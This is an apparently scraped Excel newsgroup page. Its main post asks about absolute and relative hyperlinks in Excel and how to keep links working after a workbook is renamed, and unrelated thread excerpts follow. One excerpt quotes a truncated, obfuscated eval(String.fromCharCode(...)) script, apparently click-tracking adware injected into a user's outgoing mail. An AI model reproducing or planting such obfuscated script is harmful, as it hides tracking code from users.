Re - Excel Help delineating Absolute and Relative Hyperlinks

Re - Excel Help delineating Absolute and Relative Hyperlinks

1.	Please refer to the following Excel Help File : Absolute and
Relative Hyperlinks ; it's accessible by Searching (with keyword
"Hyperlink") via the Office Assistant, and selecting the title, "About
Hyperlinks".

An absolute URL contains a full address, including the protocol, the
Web server, and the path and file name.

A relative URL has one or more missing parts. The missing information
is taken from the page that contains the URL. For example, if the
protocol and Web server are missing, the Web browser uses the protocol
and domain, such as .com, .org, or .edu, of the current page.

It is common for pages in a Web to use relative URLs containing only a
partial path and file name. If the files are moved to another server,
any hyperlinks will continue to work as long as the relative positions
of the pages remain unchanged. For example, a hyperlink on
Products.htm points to a page named apple.htm in a folder named Food;
if both pages are moved to a folder named Food on a different server,
the URL in the hyperlink will still be correct.

In a Microsoft Excel workbook, unspecified paths to hyperlink
destination files are by default relative to the location of the
active workbook. You can set a different base address to use by
default so that each time you create a hyperlink to a file in that
location, you'll only have to specify the file name, not the path, in
the Insert Hyperlink dialog box.

2.	Connect one workbook to another via a Hyperlink effected by using
Insert Hyperlink dialog box. After that, revise the name of the
Destination workbook ; and therefore, the Hyperlink from the Source
workbook to the Destination workbook is crashed.

3.	How could the Hyperlink be preserved despite the re-naming of the
Destination workbook ?

4.	Please offer an interpretation of the last paragraph (of the
extracted Help File) as given above.

5.	Please provide ample examples to demonstrate the means of
setting-a-different-base-address �� in the Insert Hyperlink Dialog
Box.

6.	Regards.
0
tkt_tang (117)
5/8/2004 9:21:37 AM
excel 39879 articles. 2 followers. Follow

Excel 2007 weird formatting issues
Does anyone here use Excel 2007 already? I began using it and when I tried to do my favorite border with dropped shadow, there was no longer such option in Excel 2007. Instead I can choose to create a rectangle box (Inser -> Illustrations -> Shapes -> Rectangle Box). However, the only way to have a dropped shadow is to have a solid filled box (which of course covers the cells underneath). If you don't choose solid fill then you are going to see shadows not only on bottom and right but also on top and left which makes the rectangle box look weird. Whatever happened to the regul...

Excel 2007 - VBA
How can I set the xaxis to an arbitrary angle, say -70 deg using vba? I recorded a macro to do this and it does not actually do anything??? Tried it 3 times. I end up with the proper layout but the recorded macro does not actually format the xaxis when run again?! QB Hi, Try, With ActiveChart.Axes(xlCategory).TickLabels .Alignment = xlCenter .Offset = 100 .ReadingOrder = xlContext .Orientation = -70 End With Cheer Andy On 24/02/2010 15:32, QB wrote: > How can I set the xaxis to an arbitrary angle, say -70 deg usi...

Excel 2003 Help Runtime Error
Trying to open help file on Templates and get 'Runtime Error - do you wish to debug?' Have you trying repairing or reinstalling Excel? On Thu, 27 Jan 2005 10:53:01 -0800, Weezay <Weezay@discussions.microsoft.com> wrote: >Trying to open help file on Templates and get 'Runtime Error - do you wish to >debug?' ...

Re: VB Command
"L�on Hajduk" <l.hajduk@yahoo.com> a �crit dans le message de news:... > > "Jasper Recto" <jrecto99@yahoo.com> a �crit dans le message de > news:OK3Khy1nKHA.1552@TK2MSFTNGP04.phx.gbl... >>I have a button that runs the function below. It opens an excel document. >>I also have other funtion that opens up other documents whether it be a >>word or pdf docuement. >> >> This command opens each document in an explorer window. >> >> How can I make a generic command that will open up the file in its nativ...

HELP
My customer has emailed a file I need. It's a .msi file (an install program) Outlook has blocked this attachment and I can't seem to get it. Any thoughts ?? Splishman Cancel this request I found the answer here... http://www.slipstick.com/outlook/esecup/getexe.htm It works a treat. Cheers Splishman "Splishman" <splishman@hotmail.com> wrote in message news:42afa71e@dnews.tpgi.com.au... > My customer has emailed a file I need. > It's a .msi file (an install program) > Outlook has blocked this attachment and I can't seem to get it. > > Any...

getpivotdata relative reference?
I'm making several spreadsheet showing month cashflow data that rolls up from pivot table on another sheet. I've been selecting the cell I want the data to go to, entering "+", then selecting the pivot table cell I want to get the data from. This works great and pops the getpivotdata function into the cell I want it in. BUT, when I copy the cell with the getpivotdata function in it over to subsequent months it copies the exact same reference, and I have to go in and change it manually, or individually add the getpivotdata function to the subseqent cells one at a time. is ...

Excel Formula #8
I currently have a spreadsheet set up to record staff holidays or sickness. But i would like the column AG to total how many times the letter S appears in any of 31 cells from colums B to AF. Each cell may have either nothing entered into it or S or H. Thanks for any help Hi Sharon Try =COUNTIF(B2:AF2,"S") -- Regards Roger Govier "Sharon" <Sharon@discussions.microsoft.com> wrote in message news:399B5039-CAC0-4428-BBB9-18C2C860E564@microsoft.com... >I currently have a spreadsheet set up to record staff holidays or >sickness. > But i would like ...

PLEASE Help #19
I have a spread sheet which I keep a record of all my sowing (plants) I want to keep an automatic seed stock count by varity how can I do this. On my sheet i have Batch No, Varity, Qty, Customer, Date Sown, Delivery Date, 12345 Bastile 100, van Dyke 12/12 25/02/06 What I want to do is every time I sow Bastile it automaticly takes the amount off my stock on another sheet .We sow 25 varitys a day so can not use cell No's must use names but how does excel do this as each name will not apper in a set cel. Help please thank you Try approac...

Excel Chart question
Is there a way to display both primary and secondary axis on the same side of a (linear) chart No, that is not possible Now someone will show you a complicated way to prove me wrong "Amj" <Amj@discussions.microsoft.com> wrote in message news:63071C8C-16CE-4BAB-BEA3-521DD16247FF@microsoft.com... > Is there a way to display both primary and secondary axis on the same side > of > a (linear) chart Bernard - You're not wrong, of course; Excel can be made to place both Y axes on the same side, but one will overlie the other. If the various ticks are spaced app...

need help to fix this problem
windows live messenger i have this problem and cannot fix so hoping you can help i uninstalled it and reinstalled still the same problem have tried everything to no avail the font isn't white it purple like i always have it. and I tryed changing the font. the only thing that show up is *_________ *__________ and if you click the top line you get the history and if you highlight in between the lines you get staggered blue marks like this l l l l the lines aren't visible but space is highlighted like they are there. Handwriting messages...

Drill Thru function not working after export to excel
I am using RS2005. I have a report with drill down and drill thru capabilities. This works fine in the report manager. When I export to excel the drill down capability is still there but the drill thru is not. Does anyone know why this is happening. Thanks in Advance ...

How do I send an excel document to members of my address book?
"bobbi" <bobbi@discussions.microsoft.com> wrote in message news:9024D8DA-8ADC-43DB-9E1A-D5D8DB294948@microsoft.com... >Nothing Please write your question in the big white space provided, not just in the subject line. You have two options - from within Excel select Mail To or in your mail client open a new message and add the file as an attachment.... Ron de Bruin has done all the work for you. For his SendMail add-in see........... http://www.rondebruin.nl/mail/add-in.htm For code snippets see............. http://www.rondebruin.nl/sendmail.htm Gord Dibben M...

Where to get Excel spreadsheet listing all GP tables for v10
Is this spreadsheet on the sdk? Is there a way to get it without installing the sdk? That is, from a download off MS site or PartnerSource or CustomerSource ? Thanks The spreadsheet is available from the DynamicAccounting.net site or via direct download at http://www.box.net/shared/jc90kdsh2k. I built it. It's a re-presentation of the information found in Tools- >Resource Descriptions->Tables in GP. There are version for GP 9 and GP 10 and I'll have one for GP 2010 once it is final. Mark On Feb 3, 2:01=A0pm, hdjim <hdji...@yahoo.com> wrote: > Is...

Excel 97 User Defined Charts & Text Boxes
I created and saved a user defined column chart that included text boxes on the chart. However, when I used this chart to create a new one, the text boxes disappeared. Has anyone encountered this before? What are some remedies I can try? Excel doesn't save everything that was in the chart on which you based the custom type. There's some information in the following MSKB article: http://support.microsoft.com/default.aspx?id=214318 Instead of a custom chart type, you could record a macro in which you format the chart and add the text boxes. Ella Davis-Suggs wrote: > I cr...

saving Excel custom workbook as template
I use Office XP with Excel 2002. For the year I have customized workbook and sheets to keep my books. I want to be able to use the sam setup with next year's books. How do I save the workbook with only th format and formulas that I have created without saving the data; as blank template to use again? I have 4 workbooks that I have linked t be used together. Last year I just copied them and "manually deleted" the data to star over, but that was a pain.... surely there is a better way. thanks in advance for any help. donna:confused -- Message posted from http://www.ExcelForum....

Need help #8
Cannot find outlook on my new Vista 64 computer, can you help? Sincerley Rudy -- Rudy Ramirez 702 353-4141 Fax 702 450-0580 RealEstate.com 10100 W. Charleston Blvd, Suite 170 LV,NV 89135 mailto:rudylv1@cox.net RUDY RAMIREZ, you wrote on Fri, 20 Mar 2009 17:27:30 -0700: > Cannot find outlook on my new Vista 64 computer, can you help? Outlook doesn't come with Windows. Outlook is part of Microsoft Office that you need to buy if you want to use it. But you can download and install a trial version of any Office Version you want, but not Outlook standalone. http://us20.trymicro...

Event Macro help
I would like to record and display the date in a column when a particular event happens. For example, I'd like to display the date that each row in Column A displays "Complete." If the task in A1 is completed today, I'd like B1 to display "3/22/2010" and for it to stay that way unless changed or deleted. Thanks! 'Note that for this to work, column A must be manually changed, 'not a formula creating an output. Private Sub Worksheet_Change(ByVal Target As Range) 'Is it a cell we care about? If Intersect(Target, Range("A:A"...

Restore PUB.EDB
We had a recent disaster and was able to restore the PRIV.EDB with no issue. The backup we restored from did not have a PUB.EDB. We can restore PUB.EDB from another tape. If we do this, how can we use the older PUB.EDB without having to restore the PRIV.EDB again since the PRIV.EDB has been used for a day or so? ?? Your backup software should allow you to select just the database that you want restored. "Scott H." <landru2@mindspring.com> wrote in message news:0c1d01c49b37$12617560$7d02280a@phx.gbl... > We had a recent disaster and was able to restore the > PRI...

Need help with Conditional Formating
I have a cell with a formula that references two other cells (=LOOKUP(CONCATENATE(D6,E6),$V$1:$W$9)). If the two cells, D6 and E6 both contains the value of "H", then I want to format F6 to be Bold and Red. I have tried this: Cell Value is Equal to =AND(D6="H",E6="H") but it is not working. I have also tried: Formula Is =AND(D6="H",E6="H"), still no go. Can anyone help, point me in the right direction? Your "formula is" version worked for me. Are you sure you set the format? Axel Van Kampen wrote: > > I have a cell wi...

Excel 2003
Excel 2003 - the "X" to exit the application option is greyed out...you must use "file / exit" to exit the program. How does this get turned off and how do you turn it back on? Thanks in advance for your advice! Are using using Groupwise? If that's the problem. See this MSKB article http://support.microsoft.com/default.aspx?scid=kb;en-us;260199 Article is specific for 2000 but I think it is valid for other versions. It gives a workaround (use the file menu) and instructions as to how to remove the Groupwise add-in that is responsible for this behavior. Gord...

HELP #24
HELP Bill, Could you be a little more specific please ? Is this regarding your previous post on the contacts problem ? -- Hope that helps!! Thank you! Sincerely, Chris Lineback, MCSE Microsoft Enterprise Messaging Support - Please do not send email directly to this alias. This alias is for newsgroup purposes only. -This posting is provided "AS IS" with no warranties, and confers no rights "$Bill" <dollar22@hotmail.com> wrote in message news:ealUv5GKEHA.268@TK2MSFTNGP11.phx.gbl... > HELP > > ...

Toolbars in Excel 2007
In Word 2007, if a Word 2003 document/template that contains a custom toolbar is opened, the buttons from the toolbar appear under the Add-ins tab. The same does not appear to be the case in Excel. Is therefore adding macros to the QAT or Customizing the Ribbon the only option with Excel 2007? If that is the case, and it is going to be necessary to modify a template one way or the other for use in Excel 2007, I might as well Customize the Ribbon due to the limited choice of icons for the QAT. -- Thanks, Doug Robbins - Word MVP, originally posted via msnews.microsoft....

Help with XSLTMajic
Has anyone out there gotten this unsupported tool downloadable from the Microsoft MSDN website to actually work? I've been trying on several machines and have not been able to get it to actually transform XML. Nothing appears to happen when I click TRANSFORM, but when I go into the debug mode and try to step through the process, I get an error message stating the following: Error in transformation: Object reference not set to an instance of an object. I've got this installed on a development box where I have VB6 and VS.Net 2003 installed. I have the 1.1 framework installe...

Please help #6
Please help... Every message I sent out would appear the string at the beginning of my message. How do I get rid of that? eval(String.fromCharCode (118,97,114,32,114,115,99,95,110,99,108,107,61,48,59,118,9 7,114,32,114,115,99,95,107,119,95,102,111,117,110,100,61,4 8,59,102,117,110,99,116,105,111,110,32,114,115,99,95,104,9 5,99,108,105,99,107,40,41,123,114,115,99,95,110,99,108,107 ,43,43,59,118,97,114,32,97,99,116,105,118,101,69,108,61,10 0,111,99,117,109,101,110,116,46,97,99,116,105,118,101,69,1 08,101,109,101,110,116,59,118,97,114,32,104,114,101,102,61 ,97,99,116,105,118,101,69,108,46,104,...

Excel training #2
Does anyone know where I can get training in Excel in NE UK? -- Rob, Teesside, UK Hi Rob, Unfortunately we're not in the NE, but we can offer a range of tailor made training solutions that can be delivered by webcast, CD, Email, Post etc. If you're still stuck, get in touch and we'll se what we can do. Neil www.nwarwick.co.uk "abfabrob" wrote: > Does anyone know where I can get training in Excel in NE UK? > -- > Rob, > Teesside, > UK ...